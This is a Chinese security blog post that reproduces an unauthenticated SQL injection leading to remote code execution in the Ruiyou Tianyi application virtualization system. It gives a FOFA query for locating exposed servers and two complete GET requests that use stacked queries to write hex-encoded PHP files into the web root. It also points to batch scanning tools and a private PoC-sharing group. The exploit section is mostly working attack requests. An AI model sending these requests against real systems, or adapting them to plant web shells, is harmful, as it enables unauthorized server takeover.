【漏洞复现】瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞

于 2024-06-22 18:03:08 发布
阅读量706 收藏 4
点赞数 8
分类专栏: 漏洞复现篇 文章标签: 瑞友天翼 RCE sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139885924
版权

0x01 产品简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。

0x02 漏洞概述

瑞友天翼应用虚拟化系统中的 \Home\Controller\AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE。

0x03 搜索语法

app="REALOR-天翼应用虚拟化系统"

在这里插入图片描述

0x04 漏洞复现

POC1

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: your-ip

在这里插入图片描述
在这里插入图片描述
POC2

GET /hmrao.php?s=/Admin/appsave&appid=1%27%29%3Bselect%200x3c3f70687020706870696e666f28293b3f3e%20into%20outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cqwe.xgi%27%23 HTTP/1.1
Host: your-ip

在这里插入图片描述
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
瑞友天翼应用虚拟化系统SQL注入远程代码执行漏洞复现
0xSec
05-07 1402
瑞友天翼应用虚拟化系统中的 \Home\Controller\AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE
瑞友天翼应用虚拟化系统RCE漏洞复现+利用
热门推荐
0xSec
04-18 2万+
瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统执行任意代码,(该漏洞是通过SQL注入写入后门文件进行代码执行)。
Goby 漏洞发布| 瑞友天翼应用虚拟化系统 /hmrao.php SQL注入漏洞
m0_46699477的博客
05-13 371
瑞友天翼应用虚拟化系统是基于服务器计算(Server-based Computing)架构的应用虚拟化平台。它将用户 各种应用软件(ERP/OA/CRM…)集中部署在瑞友天翼服务器(群)上,客户端通过 WEB 即可快速安全的访问经服务器上授权 的应用软件,实现集中应用远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。
漏洞复现瑞友天翼应用虚拟化系统-SQL注入-ConsoleExternalApi.XGI
最新发布
知黑而守白
06-19 907
瑞友天翼虚拟化系统是一种基于虚拟化技术的系统,旨在提高硬件资源利用率和灵活性,降低成本,提高效率,适用于各种规模的企业和组织。瑞友天翼虚拟化系统ConsoleExternalApi.XGI接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
瑞友天翼应用虚拟化系统SQL注入漏洞
一个努力学习网安的小牛马
05-09 829
瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过 WEB 即可访问经服务器上授权的应用软件,实现集中应用远程接入、协同办公等。瑞友天翼应用虚拟化系统中的 /Home/Controller/AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE
瑞友天翼应用虚拟化系统存在远程代码执行漏洞
nnn2188185的博客
04-19 1047
西安瑞友信息技术资讯有限公司是专业从事虚拟化及云计算解决方案提供商。瑞友天翼应用虚拟化系统存在远程代码执行漏洞,攻击者可以利用此漏洞获WEB主机权限。
Goby 漏洞更新 | 瑞友天翼应用虚拟化系统 index.php 文件远程代码执行漏洞
m0_46699477的博客
04-11 1304
瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用远程接入、协同办公等。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
瑞友天翼应用虚拟化系统appsave SQL注入漏洞
mashiro_hibiki的博客
05-10 544
1对1就业指导、面试模拟、Golang工具开发学习、Fofo高级会员、各公众号历史文章合集、各种网络安全电子书、面试题合集、最新poc、exp、最常用工具推荐、开放交流环境,解决成员问题。瑞友天翼应用虚拟化系统中的/Home/Controller/AdminController 存在 appsave接口无需鉴权并且存在SQL注入瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。将命令进行hex编码执行。访问test.php。
瑞友天翼应用虚拟化系统远程代码执行漏洞
05-05
瑞友天翼应用虚拟化系统远程代码执行漏洞是一种高危漏洞,影响瑞友天翼应用虚拟化系统的版本范围为 5.x ≤ Ruiyou Tianyi ≤ 7.0.2.1。该漏洞是由于瑞友天翼应用虚拟化系统存在缺陷,攻击者可利用该漏洞在未授权的...
虚拟化服务器+客户端瑞友天翼5.0高级版
08-21
直接安装使用。亲测可用。 虚拟化服务器+客户端瑞友天翼5.0高级版、收藏多年,现在放出。!!!!!!!!!!!!!!!!!!!!
瑞友天翼应用虚拟化系统(GWT)V6.0服务器端和谐补丁
06-29
瑞友天翼应用虚拟化系统(GWT)V6.0是一款高效的企业级软件解决方案,旨在将应用程序的运行和管理从本地设备上移至云端,从而实现远程访问、集中管理和优化资源分配。这款系统的核心是将应用软件转化为可以通过网络...
瑞友天翼应用虚拟化系统(GWT)V7.0服务器端和谐补丁
06-29
瑞友天翼应用虚拟化系统(GWT)V7.0是一款专为企事业单位设计的高效、安全的应用交付平台。该系统基于应用虚拟化技术,旨在解决远程访问、多终端兼容性、网络延迟等问题,为企业提供无缝的应用部署和管理解决方案。 ...
瑞友天翼应用虚拟化系统6.0
07-31
瑞友天翼应用虚拟化系统6.0是一款高效的企业级应用发布与管理平台,旨在解决企业内部应用部署、访问及管理的问题,尤其适用于多终端、远程办公以及分布式企业环境。这款系统通过虚拟化技术,将应用程序运行在服务器...
瑞友天翼应用虚拟化系统6.0软注册配置工具
07-31
瑞友天翼应用虚拟化系统6.0是一款高效的企业级软件解决方案,旨在提供远程访问、应用发布和资源管理服务。该系统的核心理念是通过虚拟化技术将应用程序从硬件上分离出来,让用户能够在任何时间、任何地点,只要网络...
瑞友天翼应用虚拟化系统SQL注入漏洞复现
The current road is different, love needs to distinguish between right and wrong
05-15 231
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。其hmrao.php接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用攻击者可以利用SQL注入漏洞执行命令,进而控制服务器系统。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
瑞友天翼应用虚拟化系统 /Admin/appsave 存在SQL注入漏洞
wan___she__pi的博客
05-10 364
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。瑞友天翼应用虚拟化系统/Admin/appsave存在SQL注入漏洞,攻击者可以利用此漏洞获得数据库和WEB主机权限。成功后,访问路径xxxxxxxxxx/ceshi.xgi。
瑞友天翼应用虚拟化系统(gwt)v6.0服务器端和谐补丁
06-15
瑞友天翼应用虚拟化系统(GWT)是一款企业级云计算解决方案,可实现应用程序的虚拟化、集中管理和访问,提高工作效率和资源利用率。但出于某些原因,GWT服务器可能会出现一些不兼容或漏洞的情况,导致系统故障或安全风险。为了解决这些问题,瑞友天翼发布了GWT v6.0服务器端和谐补丁。 这个补丁主要作用是修复GWT服务器端的安全漏洞和兼容性问题,并对系统进行优化,提升性能和稳定性。通过添加补丁,用户可保证系统的稳定性和安全性,避免数据泄露或系统崩溃对企业造成影响。 该补丁的安装需要严格按照瑞友天翼发布的安装指南进行操作,以保证补丁的有效性和稳定性。用户在安装前需备份系统数据和配置文件,以防补丁安装出现异常,影响系统运行。 总之,瑞友天翼应用虚拟化系统(GWT)服务器端和谐补丁的发布是为了解决系统安全和兼容性问题,并提高系统性能和稳定性,用户可根据需要自行选择安装。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值